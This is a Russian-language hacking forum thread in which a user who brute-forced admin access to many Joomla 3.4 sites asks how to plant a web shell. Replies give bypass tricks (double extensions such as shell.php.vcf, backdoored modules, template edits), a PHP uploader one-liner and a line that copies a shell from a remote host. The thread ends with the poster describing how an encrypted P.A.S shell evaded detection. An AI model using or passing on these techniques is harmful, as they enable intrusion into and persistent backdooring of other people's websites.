Joomla 3.4 есть доступы в админку, не могу залить шел

Discussion in 'Песочница' started by NoSpamNocash, 8 May 2015.

  1. NoSpamNocash

    NoSpamNocash New Member

    Joined:
    24 Mar 2014
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Намутил доступов в админку на кучу сайтов на Joomla 3.4, не могу залить шел, пробовал через картинки добавлять допустимое расширение php, снимать какие-то ограничения, вообще не пускает.
    Через шаблон менял код в файлах, сам код меняется, но по ссылке пустая страничка, шела нет.
    Как сейчас проще всего через админку залить шел? Читал, что джумла 3.4 теперь проверяет файлы, которые заливают через админку и определяет код шела и блочит его, хотя через картинки я даже пустой PHP не мог залить....плиз хелп)

    Вот с админки инфа по системе;

    Платформа, на которой работает PHP Linux srv159-h-st.jino.ru 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64
    Версия базы данных 5.5.41-37.0-log
    Кодировка базы данных utf8_general_ci
    Версия PHP 5.5.16
    Веб-сервер Apache
    Интерфейс между веб-сервером и PHP apache2handler
    Версия Joomla! Joomla! 3.4.0 Stable [ Ember ] 24-February-2015 23:00 GMT
    Версия Joomla! Platform Joomla Platform 13.1.0 Stable [ Curiosity ] 24-Apr-2013 00:00 GMT
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    А через шаблон как именно вы заливаитесь? через бегдор или уплодером? уверены ли вы, что вставив свой код, не нарушили структуру кода? при заливке попробуйте менять расширения шелла например на phtml, бывает в корне htaccess пропускает только индексный php, так же можно попробовать через установку модулей, а потом смотреть свой шелл в tmp, так же в зависимости от установленных компонентов из админки можно реализовать локальный инклуд
     
    _________________________
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Joomla Xplorer.
     
  4. totenkopf

    totenkopf Elder - Старейшина

    Joined:
    19 Jul 2010
    Messages:
    92
    Likes Received:
    64
    Reputations:
    19
    Можно также попробовать заливать файлы с двойным разрешенным расширением, который не знает апач.
    например: shell.php.vcf. В большинстве случаев будет прекрасно работать как php.
     
  5. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    а каким способом получил админки? если через дырку то пробуй через нее залить
     
  6. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    452
    Likes Received:
    265
    Reputations:
    40
    Старый бабаянный метод - установка victim модуля. В котором WSO конечно же :)
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Можно установить абсолютно любой модуль, перед этим встроив в него свой код.
     
    _________________________
    kubuntu likes this.
  8. smack

    smack Active Member

    Joined:
    25 Aug 2013
    Messages:
    210
    Likes Received:
    157
    Reputations:
    3
    :rolleyes:
     
  9. NoSpamNocash

    NoSpamNocash New Member

    Joined:
    24 Mar 2014
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Попробовал не работает
     
  10. NoSpamNocash

    NoSpamNocash New Member

    Joined:
    24 Mar 2014
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Установил компонент, загружаю файлы, пишет заблокированно правилами безопастности.
     
  11. NoSpamNocash

    NoSpamNocash New Member

    Joined:
    24 Mar 2014
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    через брут
     
  12. NoSpamNocash

    NoSpamNocash New Member

    Joined:
    24 Mar 2014
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Через аплоуд или изменяю код файла, когда-то работало, может и нарушаю...
    Сейчас попробую через модуль
     
  13. NoSpamNocash

    NoSpamNocash New Member

    Joined:
    24 Mar 2014
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    Через модуль тоже борода, устанавливает без файла шела...или это хостинг такой (Ukraine.com.ua) или Джумла. Я читал, что джумла просто палит код шела и удаляет его автоматом...у меня обычный WCO, возможно в этом проблема? Если у кого другие шелы? Вообще кто-то ломал джумлу 3.4, а то тупо получается админки есть, а шел залить не могу...
     
  14. Cthulchu

    Cthulchu Elder - Старейшина

    Joined:
    22 Nov 2007
    Messages:
    405
    Likes Received:
    721
    Reputations:
    85
    потому, что там стоит антивирус, очевидно, который проверяет это дело на уровне хостинга. Не думаю, что паблик шеллы будут работать. Пробуйте простенькие бекдоры, только с php-консолькой, вам же больше ничего не нужно, в принципе.
     
    NoSpamNocash likes this.
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
    NoSpamNocash likes this.
  16. fakecoder

    fakecoder Banned

    Joined:
    31 Oct 2012
    Messages:
    19
    Likes Received:
    2
    Reputations:
    2
    да ты не пихай туда шелл
    запихай оболочку простую типа
    PHP:
    if(isset($_FILE['__z'])) copy($_FILE['__z']['tmp_name'], 'z.php');
    а потом через неё зальешь шелл
     
  17. Rado

    Rado Elder - Старейшина

    Joined:
    30 May 2011
    Messages:
    281
    Likes Received:
    289
    Reputations:
    39
    Если PHP вообще заливается, то попробуй как-то так, что бы сервак сам затянул шелл.
    PHP:
    <?php copy('site.ru/shell.txt','shell.php');exit; ?>
    А вообще, если всо и пас шеллы палятся попробуй b374k очень часто меня выручал, когда все остальные не работали или не проливались.
     
  18. NoSpamNocash

    NoSpamNocash New Member

    Joined:
    24 Mar 2014
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    УРАААА, спасибо огромное, наконец-то, оказывается все просто.

    1. Отключаем антивирус у себя на компе (у меня дурака был включен, он тоже блочил много чего)
    2. http://profexer.name/pas/download.php - берем тут P.A.S шелл, при этом ставим свой пароль + он криптуется.
    3. Тупо заливаем в шаблоны - выбираем шаблон и любой файл php, все работает просто чудесно и не палится.

    Столько времени потратил, но разобрался. При этом WCO почему то банится и другие шеллы, которые пробовал.

    Тема закрыта, всем спасибо)
     
Loading...
Similar Threads - Joomla доступы админку
  1. Torchin
    Replies:
    4
    Views:
    2,944